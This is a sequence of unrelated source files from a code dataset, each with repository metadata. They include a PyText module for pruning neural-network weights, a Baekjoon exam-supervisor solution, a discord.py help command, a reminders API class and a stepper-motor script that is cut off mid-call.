projection-based (unstructured) sparsification\n\n Args:\n weights (torch.Tensor): input weight matrix\n sparsity (float32): the desired sparsity [0-1]\n\n \"\"\"\n\n class Config(Sparsifier.Config):\n sparsity: float = 0.9\n starting_epoch: int = 2\n frequency: int = 1\n layerwise_pruning: bool = True\n accumulate_mask: bool = False\n\n def __init__(\n self,\n sparsity,\n starting_epoch,\n frequency,\n layerwise_pruning=True,\n accumulate_mask=False,\n ):\n assert 0 <= sparsity 
<= 1\n self.sparsity = sparsity\n assert starting_epoch >= 1\n self.starting_epoch = starting_epoch\n assert frequency >= 1\n self.frequency = frequency\n self.layerwise_pruning = layerwise_pruning\n self.accumulate_mask = accumulate_mask\n self._masks = None\n\n @classmethod\n def from_config(cls, config: Config):\n return cls(\n config.sparsity,\n config.starting_epoch,\n config.frequency,\n config.layerwise_pruning,\n config.accumulate_mask,\n )\n\n def sparsification_condition(self, state):\n return (\n state.stage == Stage.TRAIN\n and state.epoch >= self.starting_epoch\n and state.step_counter % self.frequency == 0\n )\n\n def sparsify(self, state):\n \"\"\"\n obtain a mask and apply the mask to sparsify\n \"\"\"\n model = state.model\n # compute new mask when conditions are True\n if self.sparsification_condition(state):\n masks = self.get_masks(model)\n # applied the computed mask, self.accumulate_mask handled separately\n if not self.accumulate_mask:\n self.apply_masks(model, masks)\n\n # if self.accumulate_mask is True, apply the existent mask irregardless Stage\n if self.accumulate_mask and self._masks is not None:\n self.apply_masks(model, self._masks)\n\n def get_sparsifiable_params(self, model: Model):\n sparsifiable_params = [p for p in model.parameters() if p.requires_grad]\n return sparsifiable_params\n\n def apply_masks(self, model: Model, masks: List[torch.Tensor]):\n \"\"\"\n apply given masks to zero-out learnable weights in model\n \"\"\"\n learnableparams = self.get_sparsifiable_params(model)\n assert len(learnableparams) == len(masks)\n for m, w in zip(masks, learnableparams):\n if len(m.size()):\n assert m.size() == w.size()\n w.data *= m.clone()\n # if accumulate_mask, remove a param permanently by also removing\n # its gradient\n if self.accumulate_mask:\n w.grad.data *= m.clone()\n\n def get_masks(\n self, model: Model, pre_masks: List[torch.Tensor] = None\n ) -> List[torch.Tensor]:\n \"\"\"\n Note: this function returns the masks only but do not sparsify or modify the\n weights\n\n prune x% of weights among the weights with \"1\" in pre_masks\n\n Args:\n model: Model\n pre_masks: list of FloatTensors where \"1\" means retained the weight and\n \"0\" means pruned the weight\n\n Return:\n masks: List[torch.Tensor], intersection of new masks and pre_masks, so\n that \"1\" only if the weight is selected after new masking and pre_mask\n \"\"\"\n learnableparams = self.get_sparsifiable_params(model)\n if pre_masks:\n self._masks = pre_masks\n if self._masks is None:\n # retain everything if no pre_masks given\n self._masks = [torch.ones_like(p) for p in learnableparams]\n\n assert len(learnableparams) == len(self._masks)\n for m, w in zip(self._masks, learnableparams):\n if len(m.size()):\n assert m.size() == w.size()\n\n if self.layerwise_pruning:\n masks = []\n for m, param in zip(self._masks, learnableparams):\n weights_abs = torch.abs(param.data).to(param.device)\n # absolute value of weights selected from existent masks\n weights_abs_masked_flat = torch.flatten(weights_abs[m.bool()])\n total_size = weights_abs_masked_flat.numel()\n if total_size > 0:\n # using ceil instead of floor() or int()\n # because at least one element in the tensor required to be selected\n max_num_nonzeros = math.ceil(total_size * (1 - self.sparsity))\n # only pruned among the weights slected from existent masks\n topkval = (\n torch.topk(weights_abs_masked_flat, max_num_nonzeros)\n .values.min()\n .item()\n )\n # intersection of the new mask and pre_mexistent masks,\n # mask == 1 retain, 
mask == 0 pruned,\n mask = (weights_abs >= topkval).float() * m\n else:\n mask = param.new_empty(())\n masks.append(mask)\n else:\n # concatenated flatten tensor of learnableparams that have _masks as True\n learnableparams_masked_flat = torch.cat(\n [\n torch.flatten(p[m.bool()])\n for m, p in zip(self._masks, learnableparams)\n ],\n dim=0,\n )\n # using ceil instead of floor() or int() because at least one element\n # in the tensor required to be selected\n max_num_nonzeros = math.ceil(\n learnableparams_masked_flat.numel() * (1 - self.sparsity)\n )\n # select globally the top-k th weight among weights selected from _masks\n topkval = (\n torch.topk(torch.abs(learnableparams_masked_flat), max_num_nonzeros)\n .values.min()\n .item()\n )\n # intersection of the new mask and _masks,\n # mask == 1 retain, mask == 0 pruned,\n masks = [\n (torch.abs(p.data) >= topkval).float() * m\n if p.numel() > 0\n else p.new_empty(())\n for m, p in zip(self._masks, learnableparams)\n ]\n\n if self.accumulate_mask:\n self._masks = masks\n\n return masks\n\n\nclass CRF_SparsifierBase(Sparsifier):\n class Config(Sparsifier.Config):\n starting_epoch: int = 1\n frequency: int = 1\n\n def sparsification_condition(self, state):\n if state.stage == Stage.TRAIN:\n return False\n\n return (\n state.epoch >= self.starting_epoch\n and state.step_counter % self.frequency == 0\n )\n\n def get_sparsifiable_params(self, model: nn.Module):\n for m in model.modules():\n if isinstance(m, CRF):\n return m.transitions.data\n\n def get_transition_sparsity(self, transition):\n nonzero_params = transition.nonzero().size(0)\n return (transition.numel() - nonzero_params) / transition.numel()\n\n\nclass CRF_L1_SoftThresholding(CRF_SparsifierBase):\n \"\"\"\n implement l1 regularization:\n min Loss(x, y, CRFparams) + lambda_l1 * ||CRFparams||_1\n\n and solve the optimiation problem via (stochastic) proximal gradient-based\n method i.e., soft-thresholding\n\n param_updated = sign(CRFparams) * max ( abs(CRFparams) - lambda_l1, 0)\n \"\"\"\n\n class Config(CRF_SparsifierBase.Config):\n lambda_l1: float = 0.001\n\n def __init__(self, lambda_l1: float, starting_epoch: int, frequency: int):\n self.lambda_l1 = lambda_l1\n assert starting_epoch >= 1\n self.starting_epoch = starting_epoch\n assert frequency >= 1\n self.frequency = frequency\n\n @classmethod\n def from_config(cls, config: Config):\n return cls(config.lambda_l1, config.starting_epoch, config.frequency)\n\n def sparsify(self, state):\n if not self.sparsification_condition(state):\n return\n model = state.model\n transition_matrix = self.get_sparsifiable_params(model)\n transition_matrix_abs = torch.abs(transition_matrix)\n assert (\n len(state.optimizer.param_groups) == 1\n ), \"different learning rates for multiple param groups not supported\"\n lrs = state.optimizer.param_groups[0][\"lr\"]\n threshold = self.lambda_l1 * lrs\n transition_matrix = torch.sign(transition_matrix) * torch.max(\n (transition_matrix_abs - threshold),\n transition_matrix.new_zeros(transition_matrix.shape),\n )\n current_sparsity = self.get_transition_sparsity(transition_matrix)\n print(f\"sparsity of CRF transition matrix: {current_sparsity}\")\n\n\nclass CRF_MagnitudeThresholding(CRF_SparsifierBase):\n \"\"\"\n magnitude-based (equivalent to projection onto l0 constraint set) sparsification\n on CRF transition matrix. 
Preserving the top-k elements either rowwise or\n    columnwise until the sparsity constraint is met.\n    \"\"\"\n\n    class Config(CRF_SparsifierBase.Config):\n        sparsity: float = 0.9\n        grouping: str = \"row\"\n\n    def __init__(self, sparsity, starting_epoch, frequency, grouping):\n        assert 0 <= sparsity <= 1\n        self.sparsity = sparsity\n        assert starting_epoch >= 1\n        self.starting_epoch = starting_epoch\n        assert frequency >= 1\n        self.frequency = frequency\n        assert (\n            grouping == \"row\" or grouping == \"column\"\n        ), \"grouping needs to be row or column\"\n        self.grouping = grouping\n\n    @classmethod\n    def from_config(cls, config: Config):\n        return cls(\n            config.sparsity, config.starting_epoch, config.frequency, config.grouping\n        )\n\n    def sparsify(self, state):\n        if not self.sparsification_condition(state):\n            return\n        model = state.model\n        transition_matrix = self.get_sparsifiable_params(model)\n        num_rows, num_cols = transition_matrix.shape\n        trans_abs = torch.abs(transition_matrix)\n        if self.grouping == \"row\":\n            max_num_nonzeros = math.ceil(num_cols * (1 - self.sparsity))\n            topkvals = (\n                torch.topk(trans_abs, k=max_num_nonzeros, dim=1)\n                .values.min(dim=1, keepdim=True)\n                .values\n            )\n\n        else:\n            max_num_nonzeros = math.ceil(num_rows * (1 - self.sparsity))\n            topkvals = (\n                torch.topk(trans_abs, k=max_num_nonzeros, dim=0)\n                .values.min(dim=0, keepdim=True)\n                .values\n            )\n\n        # trans_abs < topkvals is a broadcasted comparison\n        transition_matrix[trans_abs < topkvals] = 0.0\n        current_sparsity = self.get_transition_sparsity(transition_matrix)\n        print(f\"sparsity of CRF transition matrix: {current_sparsity}\")\n\n\nclass SensitivityAnalysisSparsifier(Sparsifier):\n    class Config(Sparsifier.Config):\n        pre_train_model_path: str = \"\"\n        analyzed_sparsity: float = 0.8\n        # we don't use all eval data for analysis, only use a portion of the data.\n        max_analysis_batches: int = 0\n        # allow the user to skip pruning for some weight. 
Here we set the max\n # number of weight tensor can be skipped for pruning.\n max_skipped_weight: int = 0\n # if we already did sensitivity analysis before\n pre_analysis_path: str = \"\"\n sparsity: float = 0.8\n # if we use iterative pruning\n iterative_pruning: bool = True\n # the total number of pruning iterations for iterative pruning, where where\n # we incrementally increase the sparsity at each iteration\n pruning_iterations: int = 2\n # the ratio of the start sparsity to the final sparsity\n start_sparsity_ratio: float = 0.5\n\n def __init__(\n self,\n pre_train_model_path,\n analyzed_sparsity,\n max_analysis_batches,\n max_skipped_weight,\n pre_analysis_path,\n sparsity,\n iterative_pruning,\n pruning_iterations,\n start_sparsity_ratio,\n ):\n assert PathManager.exists(\n pre_train_model_path\n ), \"The pre-trained model must be exist\"\n self.pre_train_model_path = pre_train_model_path\n self.param_dict = None\n assert (\n 0.0 <= analyzed_sparsity <= 1.0\n ), \"Analyzed sparsity need to be in the range of [0, 1]\"\n self.analyzed_sparsity = analyzed_sparsity\n self.max_analysis_batches = max_analysis_batches\n self.max_skipped_weight = max_skipped_weight\n self.require_mask_parameters = []\n self.pre_analysis_path = pre_analysis_path\n assert (\n 0.0 <= sparsity <= 1.0\n ), \"Pruning sparsity need to be in the range of [0, 1]\"\n self.sparsity = sparsity\n self._masks = None\n self.analysis_state = State.OTHERS\n self.iterative_pruning = iterative_pruning\n\n # members used for iterative pruning\n if self.iterative_pruning:\n assert (\n pruning_iterations > 1\n ), \"iterative pruning should contains at least two pruning iterations\"\n self.pruning_iterations = pruning_iterations\n self.start_sparsity = start_sparsity_ratio * sparsity\n self.end_sparsity = self.sparsity\n self.epochs_per_iter = 0\n self.sparsity_increment = 0.0\n\n @classmethod\n def from_config(cls, config: Config):\n return cls(\n config.pre_train_model_path,\n config.analyzed_sparsity,\n config.max_analysis_batches,\n config.max_skipped_weight,\n config.pre_analysis_path,\n config.sparsity,\n config.iterative_pruning,\n config.pruning_iterations,\n config.start_sparsity_ratio,\n )\n\n def get_sparsifiable_params(self, model):\n param_dict = {}\n for module_name, m in model.named_modules():\n # Search the name of all module_name in named_modules\n # only test the parameters in nn.Linear\n if isinstance(m, nn.Linear):\n # module_name: module.xxx\n # param_name: module.xxx.weight\n # we only check weight tensor\n param_name = module_name + \".weight\"\n param_dict[param_name] = m.weight\n\n return param_dict\n\n def get_mask_for_param(self, param, sparsity):\n \"\"\"\n generate the prune mask for one weight tensor.\n \"\"\"\n n = int(sparsity * param.nelement())\n if n > 0:\n # If n > 0, we need to remove n parameters, the threshold\n # equals to the n-th largest parameters.x\n threshold = float(param.abs().flatten().kthvalue(n - 1)[0])\n else:\n # If n == 0, it means all parameters need to be kept.\n # Because the absolute parameter value >= 0, setting\n # threshold to -1 ensures param.abs().ge(threshold)\n # is True for all the parameters.\n threshold = -1.0\n # reverse_mask indiciates the weights that need to be kept\n mask = param.abs().ge(threshold).float()\n\n return mask\n\n def layer_wise_analysis(\n self, param_name, param_dict, trainer, state, eval_data, metric_reporter\n ):\n # perform pruning for the target param with param_name\n if param_name is None:\n prunable_param_shape = None\n else:\n 
prunable_param = param_dict[param_name]\n            # include the shape information for better analysis\n            prunable_param_shape = list(prunable_param.shape)\n            mask = self.get_mask_for_param(prunable_param, self.analyzed_sparsity)\n            with torch.no_grad():\n                param_dict[param_name].data.mul_(mask)\n        # get the eval_metric for the pruned model\n        with torch.no_grad():\n            # set the number of batches of eval data for analysis\n            analysis_data = eval_data\n            if self.max_analysis_batches > 0:\n                analysis_data = itertools.islice(eval_data, self.max_analysis_batches)\n            eval_metric = trainer.run_epoch(state, analysis_data, metric_reporter)\n            current_metric = metric_reporter.get_model_select_metric(eval_metric)\n            if metric_reporter.lower_is_better:\n                current_metric = -current_metric\n\n        return current_metric, prunable_param_shape\n\n    def find_params_to_prune(self, metric_dict, max_skip_weight_num):\n        require_mask_parameters = sorted(\n            metric_dict.keys(), reverse=True, key=lambda param: metric_dict[param]\n        )\n        metric_sensitivities_by_param = [\n            metric_dict[p] for p in require_mask_parameters\n        ]\n\n        skipped_weight_num = 0\n        while skipped_weight_num < max_skip_weight_num:\n            # calculate the mean and standard deviation over the weights still\n            # eligible for pruning (a [:-0] slice would be empty, so the zero\n            # case must be handled explicitly)\n            remaining = metric_sensitivities_by_param[\n                : len(metric_sensitivities_by_param) - skipped_weight_num\n            ]\n            mean_ = np.mean(remaining)\n            std_ = np.std(remaining)\n            # skip pruning of the parameter if the metric sensitivity is\n            # less than mean_ - 3 * std_, otherwise break.\n            if (\n                metric_sensitivities_by_param[-skipped_weight_num - 1]\n                >= mean_ - 3 * std_\n            ):\n                break\n            skipped_weight_num += 1\n\n        if skipped_weight_num > 0:\n            require_mask_parameters = require_mask_parameters[:-skipped_weight_num]\n\n        # return how many weights were skipped during this iteration\n        return require_mask_parameters, skipped_weight_num\n\n    def sensitivity_analysis(\n        self, trainer, state, eval_data, metric_reporter, train_config\n    ):\n        \"\"\"\n        Analyze the sensitivity of each weight tensor to the metric.\n        Prune the weight tensors one by one and evaluate the metric when the\n        corresponding weight tensor is pruned.\n        Args:\n            trainer (Trainer): the trainer used to run evaluation epochs\n            state (TrainingState): the state of the current training\n            eval_data (BatchIterator): batch iterator of evaluation data\n            metric_reporter (MetricReporter): compute metric based on training\n            output and report results to console, file.. 
etc\n train_config (PyTextConfig): training config\n\n Returns:\n analysis_result: a string of each layer sensitivity to metric.\n \"\"\"\n print(\"Analyzed_sparsity: {}\".format(self.analyzed_sparsity))\n print(\"Evaluation metric_reporter: {}\".format(type(metric_reporter).__name__))\n output_path = (\n os.path.dirname(train_config.task.metric_reporter.output_path)\n + \"/sensitivity_analysis_sparsifier.ckp\"\n )\n\n # param_dict: the dict maps weight tensor to the parameter name\n self.param_dict = self.get_sparsifiable_params(state.model)\n\n # set model to evaluation mode\n state.stage = Stage.EVAL\n state.model.eval(Stage.EVAL)\n\n metric_dict = {}\n all_param_list = [None] + list(self.param_dict.keys())\n print(\"All prunable parameters\", all_param_list)\n\n # print the sensitivity results for each weight\n print(\"#\" * 40)\n print(\"save the analysis result to: \", output_path)\n print(\"Pruning Sensitivity Test: param / shape / eval metric\")\n\n # iterate through all_param_list to test pruning snesitivity\n for param_name in all_param_list:\n print(\"=\" * 40)\n print(\"Testing {}\".format(param_name))\n state.model.load_state_dict(self.loaded_model[\"model_state\"])\n\n current_metric, prunable_param_shape = self.layer_wise_analysis(\n param_name, self.param_dict, trainer, state, eval_data, metric_reporter\n )\n if param_name is None:\n baseline_metric = current_metric\n metric_dict[param_name] = current_metric - baseline_metric\n print(\"#\" * 40)\n\n # remove baseline metric from the analysis results\n if None in metric_dict:\n del metric_dict[None]\n # write the test result into the checkpoint\n if state.rank == 0:\n with PathManager.open(output_path, \"w\") as fp:\n json.dump(metric_dict, fp)\n\n return metric_dict\n\n def sparsification_condition(self, state):\n return state.stage == Stage.TRAIN\n\n def apply_masks(self, model: Model, masks: List[torch.Tensor]):\n \"\"\"\n apply given masks to zero-out learnable weights in model\n \"\"\"\n learnable_params = self.get_required_sparsifiable_params(model)\n assert len(learnable_params) == len(masks)\n for m, w in zip(masks, learnable_params):\n if len(m.size()):\n assert m.size() == w.size()\n w.data *= m\n\n def get_current_sparsity(self, model: Model) -> float:\n trainable_params = sum(\n module.weight.data.numel()\n for name, module in model.named_modules()\n if isinstance(module, nn.Linear)\n )\n nonzero_params = sum(\n module.weight.data.nonzero().size(0)\n for name, module in model.named_modules()\n if isinstance(module, nn.Linear)\n )\n return (trainable_params - nonzero_params) / trainable_params\n\n def sparsify(self, state):\n \"\"\"\n apply the mask to sparsify the weight tensor\n \"\"\"\n # do not sparsify the weight tensor during the analysis\n if self.analysis_state == State.ANALYSIS:\n return\n\n model = state.model\n # compute new mask when conditions are True\n if self.sparsification_condition(state):\n # applied the computed mask to sparsify the weight\n self.apply_masks(model, self._masks)\n\n def get_required_sparsifiable_params(self, model: Model):\n # param_dict contains all parameters, select requied weights\n # if we reload analysis result from file, we need to calculate\n # all param_dict again.\n if self.param_dict is None:\n self.param_dict = self.get_sparsifiable_params(model)\n\n return [self.param_dict[p] for p in self.require_mask_parameters]\n\n def get_masks(self, model: Model) -> List[torch.Tensor]:\n \"\"\"\n Note: this function returns the masks for each weight tensor if\n that tensor is 
required to be pruned\n\n prune x% of the weight items among the weights; a \"1\" in the mask\n (self._masks) indicates a retained weight, a \"0\" indicates a pruned weight\n\n Args:\n model: Model\n\n Return:\n masks: List[torch.Tensor], the prune mask for the weight of all\n layers\n \"\"\"\n learnable_params = self.get_required_sparsifiable_params(model)\n\n masks = []\n for param in learnable_params:\n mask = self.get_mask_for_param(param, self.sparsity)\n masks.append(mask)\n\n return masks\n\n def load_analysis_from_path(self):\n assert PathManager.isfile(self.pre_analysis_path), \"{} is not a file\".format(\n self.pre_analysis_path\n )\n with PathManager.open(self.pre_analysis_path, \"r\") as fp:\n metric_dict = json.load(fp)\n\n return metric_dict\n\n @timing.time(\"sparsifier initialize\")\n def initialize(self, trainer, state, eval_data, metric_reporter, train_config):\n assert self.pre_train_model_path, \"must have a pre-train model\"\n # load the pretrained model\n print(\"load the pretrained model from: \" + self.pre_train_model_path)\n self.loaded_model = torch.load(\n self.pre_train_model_path, map_location=torch.device(\"cpu\")\n )\n\n # if the user specifies the analysis file, load it from that path\n if self.pre_analysis_path:\n metric_dict = self.load_analysis_from_path()\n\n else:\n self.analysis_state = State.ANALYSIS\n metric_dict = self.sensitivity_analysis(\n trainer, state, eval_data, metric_reporter, train_config\n )\n # the analysis is finished; the sparsifier can apply the prune mask.\n self.analysis_state = State.OTHERS\n\n # skip some of the weight tensors from pruning. The user can\n # specify max_skipped_weight, which limits the max number\n # of weights to be skipped.\n self.require_mask_parameters, skipped_weight_num = self.find_params_to_prune(\n metric_dict, self.max_skipped_weight\n )\n\n for p in self.require_mask_parameters:\n print(p, \" \", metric_dict[p])\n print(\"#\" * 40)\n sys.stdout.flush()\n print(str(skipped_weight_num) + \" weight tensors are skipped for pruning\")\n\n if self.iterative_pruning:\n assert (\n trainer.config.early_stop_after == 0\n ), \"Can not set early stop for iterative pruning\"\n assert (\n trainer.config.epochs % self.pruning_iterations == 0\n ), \"total training epochs should be divisible by the pruning iterations\"\n self.epochs_per_iter = trainer.config.epochs // self.pruning_iterations\n # init sparsity as self.start_sparsity, and calculate the sparsity\n # increment of each pruning iteration.\n self.sparsity_increment = (self.end_sparsity - self.start_sparsity) / (\n self.pruning_iterations - 1\n )\n self.sparsity = self.start_sparsity\n print(\n \"sparsity starts from: \",\n self.sparsity,\n \" increment of: \",\n self.sparsity_increment,\n )\n\n # prune starting from the pre-trained weights\n state.model.load_state_dict(self.loaded_model[\"model_state\"])\n # initialize and generate the pruning mask. We don't want to generate\n # the mask for each step.
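# Editor's note: get_mask_for_param is called above but not shown in this excerpt.
# A common implementation of such a mask is magnitude pruning -- zero out the
# fraction of entries with the smallest absolute values. A minimal sketch,
# assuming that semantics (hypothetical, not the pytext implementation):
import torch

def magnitude_mask(param: torch.Tensor, sparsity: float) -> torch.Tensor:
    num_prune = int(param.numel() * sparsity)  # entries to zero out
    if num_prune == 0:
        return torch.ones_like(param)
    # the magnitude of the num_prune-th smallest entry becomes the cut-off
    threshold = param.abs().flatten().kthvalue(num_prune).values
    # 1 keeps a weight, 0 prunes it
    return (param.abs() > threshold).to(param.dtype)

w = torch.randn(8, 8)
print(magnitude_mask(w, 0.5).mean())  # roughly 0.5 of the entries survive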
Otherwise, it will be time inefficient.\n self._masks = self.get_masks(state.model)\n\n def increase_sparsity(self, state):\n self.sparsity += self.sparsity_increment\n print(\"sparsity increased to: \", self.sparsity)\n\n def save_model_state_for_all_rank(self):\n # all machines should save the best model of a pruning iteration\n # if we use iterative pruning\n return self.iterative_pruning\n\n def _should_update_sparsity(self, epoch):\n return (\n self.iterative_pruning and epoch % self.epochs_per_iter == 0 and epoch > 0\n )\n\n def op_pre_epoch(self, trainer, state):\n \"\"\"\n note: invoke this function at the beginning of each pruning iteration. Each pruning\n iteration contains several epochs. In this function, we will:\n 1. update the sparsity,\n 2. reload the best model from the previous iteration,\n 3. generate the prune mask, and\n 4. apply the mask to prune the weight of the model with increased sparsity.\n \"\"\"\n # check whether we need to update the pruning sparsity this epoch\n if self._should_update_sparsity(state.epoch):\n # init best model metric as None at the beginning of each iteration.\n # this makes sure the best_model is chosen from the previous iteration\n # instead of from the entire training.\n state.best_model_metric = None\n # load best model from previous pruning iteration\n assert state.best_model_state is not None\n trainer.load_best_model(state)\n\n # the sparsity is initialized as start_sparsity and increased every iteration\n self.increase_sparsity(state)\n # starting from the second iteration, generate the new mask with increased sparsity\n self._masks = self.get_masks(state.model)\n self.apply_masks(state.model, self._masks)\n","repo_name":"facebookresearch/pytext","sub_path":"pytext/optimizer/sparsifiers/sparsifier.py","file_name":"sparsifier.py","file_ext":"py","file_size_in_byte":29395,"program_lang":"python","lang":"en","doc_type":"code","stars":6357,"dataset":"github-code","pt":"51"} +{"seq_id":"11269124124","text":"# https://www.acmicpc.net/problem/13458\n\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\ns = list(map(int,input().split()))\nb, c = map(int, input().split())\nresult = 0\n\nfor i in s:\n # test-takers in this room minus the number the chief supervisor can watch\n i -= b\n # there is always exactly one chief supervisor!\n cnt = 1\n # now work out the assistant supervisors:\n # each assistant supervisor can watch c test-takers,\n # so if anyone is left over, divide the remaining test-takers by c\n # and count the assistants needed\n # count one more if the division leaves a remainder\n if i > 0:\n cnt += i//c\n if i % c != 0:\n cnt += 1\n result += cnt\nprint(result)\n","repo_name":"nevertheless0404/Keep_studying","sub_path":"BOJ/13458_시험감독.py","file_name":"13458_시험감독.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"72952370079","text":"# Import needed libraries\nimport discord\nimport itertools\nfrom discord.ext import commands\n\n# Custom help command for the bot, so as to not use minimal or default.\n# Built on top of the minimal one.\n# Had to copy paste from the source code because there's no way to override just the lines I need to, haha...\nclass CustomHelpCommand(commands.MinimalHelpCommand):\n\n # Define \"no category\" string on init\n def __init__(self, **options):\n super().__init__(**options)\n self.no_category = \"Other\"\n \n # Replace send_pages method that is called by every help command,\n # so every help command is an embed.\n async def send_pages(self, footer = None):\n dest = self.get_destination()\n for page in self.paginator.pages:\n\n help_embed = discord.Embed(description=page, colour=discord.Colour.from_rgb(102, 120, 255))\n
if footer is not None:\n help_embed.set_footer(text=footer.replace(\"`\", \"\") + \" (case sensitive)\")\n\n await dest.send(embed=help_embed)\n\n # This is just the same method as the default MinimalHelpCommand, except it\n # passes the opening note as a parameter to send_pages so it loads it as the footer.\n async def send_bot_help(self, mapping):\n ctx = self.context\n bot = ctx.bot\n\n if bot.description:\n self.paginator.add_line(bot.description, empty=True)\n\n no_category = '\\u200b{0.no_category}'.format(self)\n def get_category(command, *, no_category=no_category):\n cog = command.cog\n return cog.qualified_name if cog is not None else no_category\n\n filtered = await self.filter_commands(bot.commands, sort=True, key=get_category)\n to_iterate = itertools.groupby(filtered, key=get_category)\n\n for category, commands in to_iterate:\n commands = sorted(commands, key=lambda c: c.name) if self.sort_commands else list(commands)\n self.add_bot_commands_formatting(commands, category)\n\n note = self.get_ending_note()\n if note:\n self.paginator.add_line()\n self.paginator.add_line(note)\n\n await self.send_pages(self.get_opening_note())\n\n\n # Same as MinimalHelpCommand but with slight modifications\n async def send_group_help(self, group):\n\n self.paginator.add_line(group.description)\n self.paginator.add_line()\n\n filtered = await self.filter_commands(group.commands, sort=self.sort_commands)\n if filtered:\n self.paginator.add_line('**%s**' % self.commands_heading)\n for command in filtered:\n self.add_subcommand_formatting(command)\n\n note = self.get_ending_note()\n if note:\n self.paginator.add_line()\n self.paginator.add_line(note)\n\n await self.send_pages()\n\n async def send_command_help(self, command):\n self.add_command_formatting(command)\n self.paginator.close_page()\n await self.send_pages()\n\n # Remove short help description off of command help.\n def add_command_formatting(self, command):\n if command.description:\n self.paginator.add_line(command.description, empty=True)\n\n signature = self.get_command_signature(command)\n if command.aliases:\n self.paginator.add_line(signature)\n self.add_aliases_formatting(command.aliases)\n else:\n self.paginator.add_line(signature, empty=True)\n\n # Remove opening note from default cog help\n async def send_cog_help(self, cog):\n bot = self.context.bot\n if bot.description:\n self.paginator.add_line(bot.description, empty=True)\n\n if cog.description:\n self.paginator.add_line(cog.description, empty=True)\n\n filtered = await self.filter_commands(cog.get_commands(), sort=self.sort_commands)\n if filtered:\n self.paginator.add_line('**%s %s**' % (cog.qualified_name, self.commands_heading))\n for command in filtered:\n self.add_subcommand_formatting(command)\n\n note = self.get_ending_note()\n if note:\n self.paginator.add_line()\n self.paginator.add_line(note)\n\n await self.send_pages()\n ","repo_name":"jSulbar/SussyBot","sub_path":"bin/helpers/help_command.py","file_name":"help_command.py","file_ext":"py","file_size_in_byte":4277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"13846450824","text":"sandwich_orders = ['BLT', 'Philly cheesesteak', 'Ham & cheese', 'Veggie', 'Chicken', 'Meatball', 'Tuna']\n\nfinished_sandwiches = []\n\nwhile sandwich_orders:\n current_sandwich = sandwich_orders.pop()\n\n print('Your ' + current_sandwich.title() + ' sandwich is ready.')\n\n finished_sandwiches.append(current_sandwich)\n\nprint('\\nThe following sandwiches
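# Editor's note: send_bot_help above depends on a subtlety of itertools.groupby --
# it only groups *adjacent* items, so the commands must already be sorted by the
# same key (hence filter_commands(..., sort=True, key=get_category)). A minimal
# standalone illustration with hypothetical command names:
import itertools

cmds = ["Music:play", "Admin:ban", "Music:skip", "Admin:kick"]
by_cat = lambda c: c.split(":")[0]
for cat, group in itertools.groupby(sorted(cmds, key=by_cat), key=by_cat):
    print(cat, list(group))
# Admin ['Admin:ban', 'Admin:kick']
# Music ['Music:play', 'Music:skip']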
are ready for pickup: ')\nfor sandwich in finished_sandwiches:\n print(sandwich)","repo_name":"MrDrDAVID/Python-practice-book","sub_path":"deli.py","file_name":"deli.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"10762728974","text":"from typing import Any, List, Mapping, Union, Optional\nfrom entities.resolvable import Resolvable\nfrom entities.generic import *\nfrom entities.reminder import Content, ReminderEntity\nfrom entities.calendar import CalendarEvent\nfrom exceptions.exceptions import UnderspecificationException\nfrom providers.data_model import DataModel\n\n\nclass Reminders(Resolvable):\n @classmethod\n def create_reminder(\n cls,\n content: Content,\n person_reminded: Optional[Contact] = None,\n date_time: Optional[DateTime] = None,\n calendar_event: Optional[CalendarEvent] = None,\n recovered_args: Optional[Mapping[str, Any]] = None,\n ) -> ReminderEntity:\n if not content:\n payload = {\n \"date_time\": date_time,\n \"person_reminded\": person_reminded,\n \"content\": content,\n \"calendar_event\": calendar_event,\n \"recovered_args\": recovered_args,\n }\n raise UnderspecificationException(\n payload=payload,\n recovery_prompt=\"What should be reminded?\",\n message=\"content argument is missing\",\n )\n reminder = ReminderEntity(\n date_time=date_time,\n person_reminded=person_reminded,\n content=content,\n )\n data_model = DataModel()\n data_model.append(reminder)\n return reminder\n\n # @exception_handler\n @classmethod\n def find_reminders(\n cls,\n person_reminded: Optional[Contact] = None,\n date_time: Optional[DateTime] = None,\n content: Optional[Content] = None,\n ) -> List[ReminderEntity]:\n data_model = DataModel()\n data = data_model.get_data(ReminderEntity)\n if date_time:\n if type(date_time) == list:\n data = [x for x in data if x.data.get(\"date_time\") in date_time]\n else:\n data = [x for x in data if x.data.get(\"date_time\") == date_time]\n\n if person_reminded:\n data = [x for x in data if x.data.get(\"person_reminded\") == person_reminded]\n\n if content:\n data = [x for x in data if x.data.get(\"content\") == content]\n\n return data\n\n @classmethod\n def delete_reminders(\n cls, reminders: Union[ReminderEntity, List[ReminderEntity]]\n ) -> bool:\n data_model = DataModel()\n data = data_model.get_data(ReminderEntity)\n if reminders:\n if type(reminders) == list:\n data = [x for x in data if x not in reminders]\n else:\n data = [x for x in data if x != reminders]\n\n return data\n","repo_name":"asafam/complex-utterance-to-code-api","sub_path":"api/v6/actions/reminders.py","file_name":"reminders.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"37761333614","text":"import mraa\nimport time\n\nin1 = mraa.Gpio(33)\nin2 = mraa.Gpio(31)\nin3 = mraa.Gpio(27)\nin4 = mraa.Gpio(23)\n\nin1.dir(mraa.DIR_OUT)\nin2.dir(mraa.DIR_OUT)\nin3.dir(mraa.DIR_OUT)\nin4.dir(mraa.DIR_OUT)\n\ndef forward(delay, steps):\n for i in range(0, steps):\n setStep(1, 0, 1, 0)\n time.sleep(delay)\n setStep(0, 1, 1, 0)\n time.sleep(delay)\n setStep(0, 1, 0, 1)\n time.sleep(delay)\n setStep(1, 0, 0, 1)\n time.sleep(delay)\n\ndef setStep(w1, w2, w3, w4):\n in1.write(w1)\n in2.write(w2)\n in3.write(w3)\n in4.write(w4)\n\nwhile True:\n forward(1000, 
